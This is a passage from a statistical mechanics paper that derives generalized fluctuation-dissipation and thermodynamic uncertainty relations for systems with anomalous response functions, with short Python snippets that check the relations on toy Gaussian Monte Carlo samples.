fluctuation-dissipation relation (\ref{unc}) has interesting
connections with different questions within statistical mechanics,
such as the extension of canonical Monte Carlo methods to allow the
study of macrostates with negative heat capacities and to avoid the
super-critical slowing down of first-order phase transitions
\cite{mc3}, the justification of a complementary relation between
energy and temperature
\cite{bohr,Heisenberg,Rosenfeld,Mandelbrot,Gilmore,Lindhard,Lavenda,Scholg,Uffink},
the development of a geometric formulation for fluctuation theory
\cite{Weinhold,rupper}, as well as Mandelbrot's derivation of
statistical mechanics from inference theory \cite{Mandelbrot}.
However, Eq.(\ref{unc}) is applicable to those equilibrium
situations where the only conjugated pair involved is
energy-temperature. Thus, this result merely constitutes a first
step towards the development of an extension of \textit{equilibrium
fluctuation-dissipation relations} compatible with the existence of
anomalous response functions
\cite{Ison,Einarsson,Chomaz,Gulminelli,Lovett,Hugo}.
In this paper, we shall extend our previous results to an
equilibrium situation with several control parameters, that is, we
shall develop a special approach to fluctuation theory \cite{landau}
in order to arrive at a suitable generalization of the familiar
fluctuation relations:
\begin{equation}\label{familiar.fd}
C_{V}=\beta^{2}\left\langle \delta
U^{2}\right\rangle,~VK_{T}=\beta\left\langle \delta
V^{2}\right\rangle,~\chi_{T}=\beta\left\langle \delta
M^{2}\right\rangle,
\end{equation}
compatible with the existence of macrostates with \textit{anomalous
values in response functions}, such as negative heat capacities
$C_{V}<0$, isothermal compressibilities $K_{T}<0$ or isothermal
magnetic susceptibilities $\chi_{T}<0$ in those magnetic systems
where this response function is expected to be nonnegative.
\section{The proposal}
\subsection{Notation conventions}
From the standard perspective of statistical mechanics, a
system-surroundings equilibrium situation with several control
parameters is customarily described by using the
\textit{Boltzmann-Gibbs distributions} \cite{landau}:
\begin{equation}
dp_{BG}\left( \left. U,X\right\vert \beta,Y\right)
=\frac{1}{Z\left(
\beta,Y\right) }\exp\left[ -\beta\left( U+YX\right) \right]\Omega\left(U,X\right)dUdX . \label{BGD}%
\end{equation}
The quantities $X=\left( V,M,P,N_{i},\ldots\right) $ represent
other macroscopic observables acting in a given application
(generalized displacements) such as the volume $V$, the
magnetization $M$ and polarization $P$, the number of chemical
species $N_{i} $, etc.; with $Y=\left(
p,-H,-E,-\mu_{i},\ldots\right) $ being the corresponding conjugated
thermodynamic parameters (generalized forces): the external pressure
$p$, magnetic $H$ and electric $E$ fields, the chemical potentials
$\mu_{i}$, etc. In the sake of simplicity, we shall consider the
Boltzmann's constant $k_{B}\equiv1$ along this work, so that,
$\beta$ in Eq.(\ref{BGD}) represents the inverse temperature,
$\beta=1/T$.
Conventionally, the system energy $U$ is the most important physical
observable in thermodynamics and statistical mechanics, and hence,
it is always distinguished from the other macroscopic observables
$X$. However, we shall not start from this distinction in the
present approach, a consideration that allows us to deal with a more
simple notation in our analysis. Let us consider the following
convention for the physical observables $\left( U,X\right)
\rightarrow I=\left( I^{1},I^{2},\ldots\right) $ and $\left( \beta
,Y\right) \rightarrow\beta=\left( \beta_{1},\beta_{2},\ldots\right)
$ for the thermodynamic parameters, in a way that the total
differential of entropy $S$ can be rewritten as follows:
$dS=\beta\left( dU+YdX\right) \rightarrow
dS=\beta_{1}dI^{1}+\beta_{2}dI^{2}+\ldots\equiv\beta_{i}dI^{i}$. We
will use hereafter the Einstein's summation convention, which allows
to rewrite the probabilistic weight of the Boltzmann-Gibbs
distribution (\ref{BGD}) as:
\begin{equation}
\omega_{BG}\left( \left. I\right\vert \beta\right)
=\frac{1}{Z\left(
\beta\right) }\exp\left( -\beta_{i}I^{i}\right) . \label{bg.w}%
\end{equation}
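To fix ideas with this convention: for a fluid characterized by the energy
and the volume one has $dS=\beta dU+\beta p\,dV$, so that
\begin{equation}
\left( I^{1},I^{2}\right) =\left( U,V\right) ,\qquad\left( \beta_{1}%
,\beta_{2}\right) =\left( \beta,\beta p\right) ,
\end{equation}
and the weight (\ref{bg.w}) reduces to the familiar isothermal-isobaric
form $\omega_{BG}\propto\exp\left[ -\beta\left( U+pV\right) \right] $.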
\subsection{Starting considerations on the distribution function}
At first glance, all that it is necessary to demand in order to
extend fluctuation relations (\ref{familiar.fd}) is to start from a
probabilistic distribution more general than the Boltzmann-Gibbs
distributions (\ref{BGD}). From a mathematical point of view, a
distribution that seems to describe the thermodynamical behavior of
a system under a general influence of an environment is the ansatz:
\begin{equation}
dp\left( I\right)=\omega\left( I\right) \Omega\left( I\right) dI,
\label{new}%
\end{equation}
whose generic probabilistic weight $\omega\left( I\right)$ admits
the Boltzmann-Gibbs form (\ref{bg.w}) as a particular case. We shall
show in the next subsections that the hypothesis (\ref{new}),
although simple, is sufficiently general to achieve our purposes. In
fact, this expression is just a direct extension of the ansatz used
in our previous work \cite{vel-unc}:
\begin{equation}
dp\left( U\right)=\omega\left( U\right) \Omega\left( U\right) dU
\end{equation}
to a more general case with several macroscopic observables. Let us
now discuss under what general background conditions the
mathematical form (\ref{new}) can be supported by physical
arguments.
A particular and conventional situation is that where the system
under study and its environment can be considered as two \textit{
separable and independent finite subsystems} that constitute a
closed system in thermodynamic equilibrium. By admitting only
additive physical observables (e.g.: energy, volume, particles
number or electric charge) obeying the constraint $I_{T}=I+I_{e}$, a
simple ansatz for the distribution function is given by:
\begin{equation}
dp\left( \left. I\right\vert I_{T}\right)=\frac{1}{W\left( I_{T}\right) }%
\Omega _{e}\left( I_{T}-I\right) \Omega \left( I\right) dI,
\label{pp1}
\end{equation}%
where $\Omega \left( I\right) $ and $\Omega _{e}\left( I_{e}\right)
$ are the densities of states of the system and the environment,
respectively, and $W\left( I_{T}\right) $, the partition function
that ensures the normalization condition:
\begin{equation}
\int_{\Gamma }dp\left( \left. I\right\vert I_{T}\right)=1.
\label{norm}
\end{equation}
Here, $\Gamma$ represents all admissible values of the system
observables $I$.
Although Eq.(\ref{pp1}) provides a simple interpretation for
Eq.(\ref{new}), it clearly dismisses some important practical
situations where the \textit{additive constraint} $I_{T}=I+I_{e}$
cannot be ensured for all physical observables involved in the
system-environment thermodynamic interaction. Significant examples
of \textit{unconstrained observables} are the magnetization
$\mathbf{M}$ or the electric polarization $\mathbf{P}$ associated
with magnetic and electric systems respectively. A formal way to
overcome such a difficulty is carried out by representing the
density of state of the environment $\Omega _{e}$ in terms of the
observables of the system $I$ under study and the set of control
parameters $a$ of the given physical situation, $\Omega _{e}=\Omega
_{e}\left( \left. I\right\vert a\right) $. Such an explicit
dependence of the density of states of the environment on the
internal state of the system follows from their mutual interaction,
which leads to the existence of \textit{correlative effects} between
these systems. Thus, one can express the corresponding distribution
function as follows:
\begin{equation}
dp\left( \left. I\right\vert a\right)=\frac{1}{W\left( a\right)
}\Omega _{e}\left( \left. I\right\vert a\right) \Omega \left(
I\right) dI. \label{ansatz2}
\end{equation}%
The subset $\Gamma_{a}$ of all admissible values of the physical
observables $I$ now depends on the control parameters $a$.
Rigorously speaking, both \textit{separability} and
\textit{additivity} represent suitable idealizations of the real
physical conditions associated with the large thermodynamic systems
with a microscopic dynamics driven by short-range interactions.
These conditions cannot be naively extended to systems with
long-range interactions, which constitute a relevant framework for
the existence of macrostates with anomalous response functions. As
already mentioned in the introductory section, remarkable examples
are the astrophysical systems, whose thermodynamic description is
hallmarked by the existence of \textit{negative heat capacities}
$C<0$. Although one cannot trivially divide a long-range interacting
system into independent subsystems, an \textit{effective
separability} can arise as a direct consequence of the
underlying microscopic dynamics in some practical situations. For
example, it is physically admissible to speak about a separability
between a globular cluster and its nearby galaxy despite the
long-range character of the gravitational interaction. Since
separability is, at least, an important condition to attribute a
reasonable physical meaning to the description of a system as an
individual entity, we shall demand this property as a necessary
requirement for the applicability of the ansatz (\ref{new}).
The existence of long-range interactions also implies the incidence
of \textit{long-range correlations}. This last feature, by itself,
modifies in a significant way the thermodynamic behavior and the
macroscopic dynamics of a physical system. If one considers the
existing analogy with conventional systems at the \textit{critical
points} (where correlation length $\xi$ diverges,
$\xi\rightarrow\infty$), the dynamics of long-range interacting
systems should exhibit some collective phenomena
with a very slow relaxation towards the final equilibrium
\cite{Dauxois}, for example, the so-called \textit{violent
relaxation} that appears during the \textit{collisionless dynamics}
of the astrophysical systems \cite{inChava}. Under this last
circumstance, it is usual that a long-range interacting system
cannot be found in a final thermodynamic equilibrium, but in a
long-living \textit{quasi-stationary state} \cite{Antoni,Latora}.
The above dynamical features establish certain analogies between
long-range interacting systems and other physical systems with a
complex microscopic dynamics such as \textit{turbulent fluids}
\cite{beck1} and \textit{glassy systems} \cite{leticia}.
According to the above reasoning, one cannot expect that the
probabilistic weight $\omega(I)$ in Eq.(\ref{new}) can always be
interpreted in terms of the density of states of the environment
$\Omega_{e}$ as the cases associated with Eqs.(\ref{pp1}) or
(\ref{ansatz2}), since they demand the existence of a final
thermodynamic equilibrium and the non-incidence of long-range
interactions. Certainly, few systems in Nature are in absolute and
final equilibrium, since this presupposes that all radioactive materials
would have decayed completely and the nuclear reactions would have
transmuted all nuclei to the most stable of isotopes. Thus, the
hypothesis about the existence of a metastable equilibrium could be
sufficient for the applicability of thermodynamics in many practical
situations. Hereafter, we shall assume that \textit{the
probabilistic weight} $\omega(I)$ \textit{accounts for a general
thermodynamic influence of an environment}, which is found, at
least, in conditions of \textit{meta-stability}. This type of
\textit{ad hoc} hypothesis, that is, the use of a
\textit{generalized statistical ensemble} with the form (\ref{new}),
is usual in the statistical mechanics literature in the last
decades. This kind of methodology has proved to be a useful
alternative to describe thermodynamic features of systems with a
complex microscopic dynamics. The reader can find a unifying
framework of all these generalized distribution functions in the
so-called \textit{Superstatistics}, a theory recently proposed by C.
Beck and E.G.D. Cohen \cite{cohen}.
The specific mathematical form of the probabilistic weight
$\omega(I)$ depends, in general, on the internal structure of the
environment, the character of its own equilibrium conditions, and
the nature of forces driving the underlying system-environment
thermodynamic interaction. Fortunately, the exact mathematical form
of the function $\omega\left( I\right) $ is unimportant in our
subsequent development. Despite its generality, we shall show
that the internal thermodynamic state of the environment is fully
characterized by a finite set of \textit{control thermodynamic
parameters} $\beta^{\omega}=\left(
\beta_{1}^{\omega},\beta_{2}^{\omega },\ldots\right) $ that
constitute a natural extension of the constant parameters
$\beta=\left( \beta_{1},\beta_{2},\ldots\right) $ of the
Boltzmann-Gibbs distributions (\ref{bg.w}). Such a reduced
description is analogous to the equilibrium situation described
within the Gibbs' canonical ensemble (\ref{can}), where the external
influence is determined by the thermostat temperature $T$ regardless of
its internal structure and composition, as long as the thermostat
exhibits a very large heat capacity and guarantees thermal
contact with the system under analysis.
\subsection{\label{effective}Thermodynamic control parameters of the environment}
The direct way to arrive at a suitable extension of the
thermodynamic control parameters $\beta=\left(
\beta_{1},\beta_{2},\ldots\right) $ of the Boltzmann-Gibbs
distributions (\ref{bg.w}) is achieved by appealing to the
\textit{conditions of thermodynamic equilibrium} such as the
condition of \textit{thermal equilibrium}, $T^{\omega
}=T^{s}$, the condition of \textit{mechanical equilibrium}, $p^{\omega}=p^{s}%
$, the condition of \textit{chemical equilibrium},
$\mu^{\omega}=\mu^{s}$, etc. As usual, the conditions of
thermodynamic equilibrium can be derived as the \textit{stationary
conditions} associated with the \textit{most likely macrostate}
$\bar{I}$ of the distribution function $\rho\left( I\right)
=\omega\left( I\right) \Omega\left( I\right) $:
\begin{equation}
\sup_{\bar{I}}\left\{ \omega\left( I\right) \Omega\left( I\right)
\right\} \Rightarrow\frac{\partial}{\partial I^{i}}\log\left\{
\omega\left( \bar{I}\right) \Omega\left( \bar{I}\right) \right\}
=0,
\end{equation}
which can be conveniently rewritten as follows:
\begin{equation}
\beta_{i}^{\omega}\left( \bar{I}\right) =\beta_{i}^{s}\left( \bar
{I}\right) . \label{eq1}%
\end{equation}
Here, $\beta_{i}^{s}$ are the system (microcanonical) thermodynamic
parameters:
\begin{equation}
\beta_{i}^{s}\left( I\right) =\frac{\partial S\left( I\right)
}{\partial
I^{i}} \label{micro.bb}%
\end{equation}
derived from the \textit{coarse-grained} entropy $S\left( I\right)
\equiv\log W\left( I\right) $ with $W\left( I\right) =\Omega\left(
I\right) \delta c$ ($\delta c$ is a small constant which makes the
volume $W$ dimensionless), while \textit{the quantities}
$\beta_{i}^{\omega}$ \textit{defined by}:
\begin{equation}
\beta_{i}^{\omega}\left( I\right) =-\frac{\partial\log\omega\left(
I\right) }{\partial I^{i}} \label{eff.temp}%
\end{equation}
\textit{are the control thermodynamic parameters of the
environment}. This last definition constitutes a fundamental
consideration in the present development.
As expected, the environment control thermodynamic parameters
(\ref{eff.temp}) drop to the constant parameters $\left\{
\beta_{i}\right\} $ of the Boltzmann-Gibbs distributions
(\ref{bg.w}) by replacing the general probabilistic weight
$\omega\left( I\right) $ by the one associated with this last
ensemble $\omega_{BG}\left( I\right) $. Similarly, they drop to
its microcanonical definitions (\ref{micro.bb}) when the environment
is just a short-range interacting system in a final thermodynamic
equilibrium, that is, when the probabilistic weight $\omega$ is
proportional to the states density $\Omega_{e}$. However, these
thermodynamic parameters become \textit{effective} in the other cases,
especially in those practical situations where the probabilistic
weight $\omega\left( I\right) $ corresponds to an environment in a
\textit{metastable or quasi-stationary equilibrium}. The possibility
to extend this type of thermodynamic concepts to situations of
metastability is not strange, since there exists robust evidence
supporting the introduction of the concept of \textit{effective
temperature} in non-equilibrium systems (see ref.\cite{leticia}
and references therein).
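For the Boltzmann-Gibbs weight (\ref{bg.w}), the definition
(\ref{eff.temp}) indeed returns the constant control parameters:
\begin{equation}
\beta_{i}^{\omega}\left( I\right) =-\frac{\partial}{\partial I^{i}}\left[
-\beta_{j}I^{j}-\log Z\left( \beta\right) \right] =\beta_{i},
\end{equation}
so that $\delta\beta_{i}^{\omega}\equiv0$ and all such correlations
vanish identically in this limiting case.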
A remarkable feature of the environment thermodynamic parameters
(\ref{eff.temp}) is \textit{their implicit dependence on the
instantaneous macrostate} $I$ \textit{of the system}, since these
thermodynamic quantities are only constant for the particular case
of the Boltzmann-Gibbs distributions. Consequently, it is the rule
rather than the exception that \textit{the underlying
system-environment interaction provokes the existence of
non-vanishing correlated fluctuations among the environment
thermodynamic parameters and system observables}, $ \left\langle
\delta\beta_{i}^{\omega}\delta I^{j}\right\rangle \not =0$. Such a
realistic behavior of the interacting macroscopic systems is
systematically disregarded by the use of Boltzmann-Gibbs
distributions (\ref{bg.w}).
The quantities $\left\{ \beta_{i}^{\omega}\right\} $ act as
control parameters during the system-environment thermodynamic
interaction. A simple way to illustrate this role is by using the
probabilistic weight $\omega\left( I\right) $ in the Metropolis
Monte Carlo simulation \cite{met} of the system under the present
equilibrium conditions. The acceptance probability for a Metropolis
move $p\left( \left. I\right\vert I+\Delta I\right) $ is given by:
\begin{equation}
p\left( \left. I\right\vert I+\Delta I\right) =\min\left\{ \frac
{\omega\left( I+\Delta I\right) }{\omega\left( I\right)
},1\right\} .
\label{p1}%
\end{equation}
The fluctuations of the macroscopic observables satisfy the
condition $\left\vert \Delta I\right\vert \ll\left\vert I\right\vert
$ whenever the size $N$ of the system is sufficiently large,
allowing in this way to introduce the following approximation:
\begin{equation}
\log\left\{ \frac{\omega\left( I+\Delta I\right) }{\omega\left(
I\right)
}\right\} \simeq\frac{\partial\log\omega\left( I\right) }{\partial I^{i}%
}\cdot\Delta I^{i}
\end{equation}
and rewrite the acceptance probability (\ref{p1}) in an analogous
fashion to the usual Metropolis algorithm based on the
Boltzmann-Gibbs weight (\ref{bg.w}):
\begin{equation}
p\left( \left. I\right\vert I+\Delta I\right) \simeq\min\left\{
\exp\left[ -\beta_{i}^{\omega}\left( I\right) \Delta I^{i}\right]
,1\right\} .
\label{met.b}%
\end{equation}
This last expression shows that the environment thermodynamic
parameters (\ref{eff.temp}) provide a simple extension of the control
parameters of the Boltzmann-Gibbs distribution (\ref{bg.w}). Later, we
shall employ this acceptance probability to perform numerical
simulations.
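As an illustration, the acceptance rule (\ref{p1}) can be sketched numerically. The following is a minimal sketch (not the code employed in our simulations) assuming a hypothetical Gaussian-ensemble weight $\omega(U)\propto\exp(-\beta U-\lambda U^{2}/2)$ with a single observable $U$ and a trivial density of states, for which the environment parameter $\beta^{\omega}(U)=\beta+\lambda U$ depends on the instantaneous macrostate:

```python
import numpy as np

rng = np.random.default_rng(0)
beta, lam = 1.0, 0.5  # hypothetical control parameters of omega(U)

def log_omega(U):
    # log of the probabilistic weight; beta_omega(U) = -d log_omega/dU = beta + lam*U
    return -beta * U - 0.5 * lam * U**2

def metropolis(n_steps, step=1.0, U=0.0):
    """Random-walk Metropolis with the acceptance rule of Eq. (p1)."""
    samples = np.empty(n_steps)
    for k in range(n_steps):
        dU = step * rng.uniform(-1.0, 1.0)
        # min{omega(U+dU)/omega(U), 1}; for small dU this reduces to Eq. (met.b)
        if np.log(rng.random()) < min(log_omega(U + dU) - log_omega(U), 0.0):
            U += dU
        samples[k] = U
    return samples

s = metropolis(200_000)[50_000:]  # discard burn-in
# Here rho(U) is Gaussian with mean -beta/lam = -2 and variance 1/lam = 2
print(s.mean(), s.var())
```

The sample mean and variance approach the exact values $-\beta/\lambda$ and $1/\lambda$ of this toy weight.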
\subsection{Derivation of some general fluctuation relations}\label{Rigorour.r}
As already commented, the set $\Gamma$ represents all admissible
values of the system observables $I=\left( I^{1},I^{2},\ldots,
I^{n}\right) $. Let us denote by $\partial_{i}A\left( I\right)
=\partial A\left( I\right) /\partial I^{i}$ the first partial
derivatives of a given real function $A\left( I\right) $ defined
on $\Gamma$. In general, the distribution function
$\rho(I)=\omega(I)\Omega(I)$ of Eq.(\ref{new}) should obey certain
mathematical properties associated with its physical significance.
They are the following:
\begin{description}
\item[C1.] \textit{Existence}: The distribution function $\rho$ is a nonnegative,
bounded, continuous and differentiable function on $\Gamma$.
\item[C2.] \textit{Normalization}: The distribution function $\rho$ obeys the
normalization condition:%
\begin{equation}
\int_{\Gamma}\rho\left( I\right) dI=1. \label{norm}%
\end{equation}
\item[C3.] \textit{Boundary conditions}: The distribution function $\rho$
vanishes with its first partial derivatives $\left\{
\partial_{i}\rho\right\} $ on the boundary $\partial\Gamma$ of the
set $\Gamma$. Moreover, the distribution function $\rho$ satisfies
for $\alpha\leq n+1 $ the condition:
\begin{equation}
\lim_{\left\vert I\right\vert \rightarrow\infty}\left\vert
I\right\vert
^{\alpha}\rho\left( I\right) =0,\label{cond.bound}%
\end{equation}
when the boundary $\partial\Gamma$ contains the infinite point
$\left\{ \infty\right\} $ of $R^{n}$.
\item[C4.] \textit{Existence of the second partial derivatives}: The
distribution function $\rho$ admits second partial derivatives
$\left\{
\partial_{i}\partial_{j}\rho\right\} $ almost everywhere on $\Gamma$, with the
exception of a certain subset $\Sigma\subset\Gamma$ with vanishing
measure $\mu\left( \Sigma\right) $:
\begin{equation}
\mu\left( \Sigma\right) =\int_{\Sigma}\rho\left( I\right) dI=0.
\end{equation}
\end{description}
The mathematical conditions (C1-C3) constitute a direct extension of
conditions (C1-C3) of our previous work to the case of several
system observables (see subsection 3.3 of Ref.\cite{vel-unc}).
Here, we have modified condition (C3) by including the
property (\ref{cond.bound}), and we have added a fourth
requirement, condition (C4). In general, conditions (C3) and
(C4) ensure the existence of the expectation values $\left\langle
I^{i}\right\rangle $ and of relevant correlation functions such
as $\left\langle \delta I^{i}\delta I^{j}\right\rangle $.
Let us now introduce the quantity $\eta_{i}=\eta_{i}\left( I\right)
=\beta _{i}^{\omega}\left( I\right) -\beta_{i}^{s}\left( I\right)$
defined as the difference between the \textit{i}-th thermodynamic
parameters of the environment and the system, respectively. By
taking into consideration definitions (\ref{micro.bb}) and
(\ref{eff.temp}), the thermodynamic quantity $\eta_{i}$ can be
associated with a \textit{differential operator} $\hat{\eta}_{i}$
defined by:
\begin{equation}
\hat{\eta}_{i}=-\partial_{i}%
\end{equation}
due to the validity of the mathematical identity:
\begin{equation}
\hat{\eta}_{i}\rho\left( I\right) \equiv\eta_{i}\rho\left(
I\right) . \label{ope.def}
\end{equation}
Its demonstration reads as follows: the first partial derivative of
$\rho$ can be rewritten as $-\partial_{i}\rho=\left( -\partial
_{i}\log \rho\right) \rho$ and $-\partial_{i}\log
\rho\equiv-\partial_{i}\log
\omega-\partial_{i}S=\beta_{i}^{\omega}-\beta_{i}^{s}=\eta_{i}$,
with $S=\log W$ being the coarse-grained entropy and
$W=\Omega\delta c$.
The set of operators $\left\{ \hat{\eta}_{i}\right\} $ satisfies the
following identities:
\begin{equation}
\left[ A\left( I\right) ,\hat{\eta}_{i}\right]
=\partial_{i}A\left( I\right) ,~\left[
\hat{\eta}_{i},\hat{\eta}_{j}\right] =0,
\end{equation}
with $\left[ \hat{A},\hat{B}\right] =\hat{A}\hat{B}-\hat{B}\hat{A}$
being the so-called \textit{commutator} between two operators
$\hat{A}$ and $\hat{B}$. A remarkable particular case of the first
commutator is obtained when $A=\hat
{I}^{j}\equiv I^{j}$:%
\begin{equation}
\left[ \hat{I}^{j},\hat{\eta}_{i}\right] =\delta_{i}^{j}. \label{com.can}%
\end{equation}
The consecutive application of two operators $\hat{\eta}_{i}$ on the
distribution function $\rho$ leads to the following result:
\begin{equation}
\hat{\eta}_{i}\hat{\eta}_{j}\rho=\hat{\eta}_{i}\left(
\hat{\eta}_{j}\rho\right)
=\hat{\eta}_{i}\left( \eta_{j}\rho\right) =\left( -\partial_{i}\eta_{j}%
+\eta_{i}\eta_{j}\right) \rho. \label{f.d.r}%
\end{equation}
Notice here that condition (C4) is crucial for the existence of the
partial derivatives $\partial_{i}\eta_{j}$.
Now, let us combine the general mathematical properties (C1-C4) of
the distribution function $\rho\left( I\right) $ with the
operational representation (\ref{ope.def}) of the thermodynamic
quantity $\eta_{i}$ to demonstrate the validity of the following
expectation values:
\begin{equation}
\left\langle \eta_{i}\right\rangle =0,~\left\langle
\eta_{i}I^{j}\right\rangle
=\delta_{i}^{j},~\left\langle -\partial_{i}\eta_{j}%
+\eta_{i}\eta_{j}\right\rangle =0,\label{eq.gen}%
\end{equation}
which arise as particular cases of the following identity:
\begin{equation}\label{identA}
\left\langle\partial_{i}A\right\rangle=\left\langle
A\eta_{i}\right\rangle
\end{equation}
when $A=1$, $A=I^{j}$ and $A=\eta_{j}$, respectively. Here, $A(I)$
is a differentiable function that satisfies the condition $\left|A(I)\right|\leq
\lambda\left|I\right|^{2}$ as $\left|I\right|\rightarrow\infty$ whenever
the set $\Gamma$ is not finite.
The demonstration starts from the consideration of a set of arbitrary
constants $\left\{ a^{i}\right\} $, which is employed to rephrase
the integral:
\begin{equation}
a^{i}\left\langle A\eta_{i}\right\rangle
=\int_{\Gamma}Aa^{i}\eta_{i}\rho dI
\end{equation}
by using a vector $\vec{J}$ with components $J^{i}=a^{i}\rho$ as
follows:
\begin{equation}\label{aux.1}
\int_{\Gamma}Aa^{i}\eta_{i}\rho dI=\int_{\Gamma}Aa^{i}\hat{\eta}_{i}%
\rho dI=-\int_{\Gamma}A\vec{\nabla}\cdot\vec{J}dI.
\end{equation}
By using the identity:
\begin{equation}
A\vec{\nabla}\cdot\vec{J}=-\vec{\nabla}\cdot\left( A\vec{J}\right)
+\vec{J}\cdot\vec{\nabla}A,
\end{equation}
the integral (\ref{aux.1}) can be rewritten as follows:
\begin{equation}
-\int_{\Gamma}A\vec{\nabla}\cdot\vec{J}dI=-\int_{\partial\Gamma}A\vec{J}\cdot
d\vec{\sigma}+\int_{\Gamma}\vec{J}\cdot\vec{\nabla}AdI.
\end{equation}
The surface integral over the boundary $\partial\Gamma$ vanishes as
a consequence of condition (C3). This conclusion is evident when the
set $\Gamma$ is finite, since $J|_{\partial\Gamma}=0$. When the
boundary contains the infinite point, the vanishing follows from the limit:
\begin{equation}
\lim_{\left\vert I\right\vert \rightarrow\infty}\left\vert
I\right\vert ^{n-1}\left|A(I)\rho\left( I\right)\right|
\leq\lim_{\left\vert I\right\vert\rightarrow\infty}\lambda\left\vert
I\right\vert ^{n+1}\left|\rho\left(I\right)\right|=0.
\end{equation}
Identity (\ref{identA}) is obtained by considering $a^{j}=0$ for
$j\neq i$ and $a^{i}=1$ in the final expression:
\begin{equation}
a^{j}\left\langle A\eta_{j}\right\rangle
=\int_{\Gamma}\vec{J}\cdot\vec{\nabla}AdI\equiv
a^{j}\left\langle\partial_{j}A\right\rangle.
\end{equation}
By taking into account the vanishing of $\left\langle
\eta_{i}\right\rangle $ as well as the definition of the
correlation function $\left\langle
\delta\eta_{i}\delta I^{j}\right\rangle \equiv\left\langle \eta_{i}%
I^{j}\right\rangle -\left\langle \eta_{i}\right\rangle \left\langle
I^{j}\right\rangle $, the second relation of Eq.(\ref{eq.gen}) can
be conveniently rewritten as follows:
\begin{equation}
\left\langle \delta\eta_{i}\delta I^{j}\right\rangle
=\delta_{i}^{j},
\label{fundamental}%
\end{equation}
which is hereafter referred to as the \textit{fundamental
fluctuation relation}. By using this same procedure, the third
relation of Eq.(\ref{eq.gen}) can be rephrased as follows:
\begin{equation}
\left\langle \partial_{i}\eta_{j}\right\rangle =\left\langle
\delta\eta
_{i}\delta\eta_{j}\right\rangle , \label{assoc.fluct}%
\end{equation}
which is hereafter referred to as the \textit{associated fluctuation
relation}. Let us now analyze the physical consequences of these
mathematical results.
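Both relations are easy to check numerically. As a minimal sketch (assuming a hypothetical one-dimensional Gaussian $\rho(I)$, for which $\eta(I)=-\partial\log\rho/\partial I=(I-\mu)/\sigma^{2}$), the fundamental and the associated fluctuation relations are reproduced by direct sampling:

```python
import numpy as np

rng = np.random.default_rng(1)
mu, sigma = 3.0, 0.7                    # hypothetical Gaussian macrostate distribution

I = rng.normal(mu, sigma, size=1_000_000)
eta = (I - mu) / sigma**2               # eta(I) = -d log(rho)/dI

d_eta, d_I = eta - eta.mean(), I - I.mean()
print(eta.mean())                       # <eta> = 0
print(np.mean(d_eta * d_I))             # fundamental relation: <d_eta d_I> = 1
print(np.mean(d_eta**2), 1 / sigma**2)  # associated relation: <d_eta^2> = <d eta/dI> = 1/sigma^2
```

For this toy distribution $\partial\eta/\partial I=1/\sigma^{2}$ is constant, so the associated relation can be verified exactly.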
The vanishing of the expectation values $\left\langle
\eta_{i}\right\rangle $ in Eq.(\ref{eq.gen}) leads to the following
thermodynamic relations:
\begin{equation}
\left\langle \beta_{i}^{\omega}\right\rangle =\left\langle \beta_{i}%
^{s}\right\rangle , \label{thermal.ave}%
\end{equation}
whose mathematical form shows that the
\textit{conditions of thermodynamic equilibrium} are not only
supported by the argument of \textit{the most likely macrostate}
(see Eq.(\ref{eq1}) in the previous subsection), but can also be
rigorously expressed in terms of statistical expectation values. In
fact, the present version (\ref{thermal.ave}) of the thermodynamic
equilibrium conditions has a wider applicability than the
conventional version (\ref{eq1}), since the interpretation of the
equilibrium state through the most likely macrostate $\bar{I}$ is
physically relevant only for large thermodynamic systems, where
thermal fluctuations can be disregarded.
Conventionally, pairs of thermodynamic quantities such as energy $U$
and temperature $T$, volume $V$ and pressure $p$, magnetization
$\mathbf{M}$ and magnetic field $\mathbf{H}$, etc., are regarded as
\textit{conjugated thermodynamic quantities}. In this framework, the
commutation relation (\ref{com.can}) allows us to refer to the pairs
$(I^{i},\eta_{i})$ as \textit{thermodynamic complementary
quantities}. Examples of thermodynamic complementary quantities are
the energy $U$ and the inverse temperature difference
$\eta_{U}=1/T^{\omega}-1/T^{s}$ between the environment ($\omega$)
and system (s), or the generalized displacement $X$ and the quantity
$\eta_{X}=Y^{\omega}/T^{\omega}-Y^{s}/T^{s}$ defined in terms of the
generalized forces $(Y^{s},Y^{\omega})$ of the system and the
environment, respectively. The physical relevance of this new
conceptualization relies on the fact that \textit{the thermal
fluctuations of thermodynamic complementary quantities cannot be
simultaneously reduced to zero}. In order to show this claim, let
us first notice, by considering Eq.(\ref{fundamental}), that only the
fluctuations corresponding to thermodynamic complementary quantities
$(I^{i},\eta_{i})$ are \textit{statistically dependent}. Rewriting
the fluctuation relations of complementary quantities
through the well-known \textit{Schwarz inequality}:
\begin{equation}
\left\langle \delta A^{2}\right\rangle \left\langle \delta
B^{2}\right\rangle
\geq\left\langle \delta A\delta B\right\rangle ^{2}, \label{SwI}%
\end{equation}
one obtains the following remarkable relations:
\begin{equation}
\Delta\eta_{i}\Delta I^{i}\geq1, \label{unc.gen}%
\end{equation}
where $\Delta x\equiv\sqrt{\left\langle \delta x^{2}\right\rangle }$
denotes the thermal dispersion of the quantity $x$. These
inequalities obey the form of \textit{uncertainty relations} rather
analogous to the ones associated with quantum theories. In fact,
Eq.(\ref{unc.gen}) is a direct extension of the energy-temperature
uncertainty relation obtained in our previous work \cite{vel-unc}:
\begin{equation}\label{ene.unc}
\Delta U\Delta(1/T^{\omega}-1/T^{s})\geq 1
\end{equation}
to other conjugated thermodynamic quantities such as the generalized
displacement $X$ and the generalized force $Y$:
\begin{equation}\label{dis.unc}
\Delta X\Delta(Y^{\omega}/T^{\omega}-Y^{s}/T^{s})\geq 1.
\end{equation}
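For instance, the bound (\ref{unc.gen}) is saturated within the Gaussian approximation: for a one-dimensional Gaussian distribution function one has
\begin{equation}
\rho\left( I\right) \propto\exp\left[ -\frac{\left( I-\bar{I}\right)
^{2}}{2\sigma^{2}}\right] \Rightarrow\eta\left( I\right)
=\frac{I-\bar{I}}{\sigma^{2}},
\end{equation}
so that $\Delta\eta\Delta I=\left( \sigma/\sigma^{2}\right) \sigma=1$, which shows that the equality in Eq.(\ref{unc.gen}) corresponds to the Gaussian limit of large system size.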
By generalizing our previous result, the physical significance of
thermodynamic uncertainty relation (\ref{unc.gen}) is the following:
\textbf{Claim 1:} \textit{It is impossible to perform a simultaneous
exact
determination of the system conjugated thermodynamic parameter }$I^{i}$\textit{ and }$\beta_{i}^{s}=\partial_{i}%
S$\textit{ by using an experimental procedure based on the thermal
equilibrium condition (\ref{thermal.ave}) with a second system
regarded here as a \textquotedblleft measuring
apparatus\textquotedblright: any attempt to reduce to zero the
thermal uncertainties of the differences between their thermodynamic
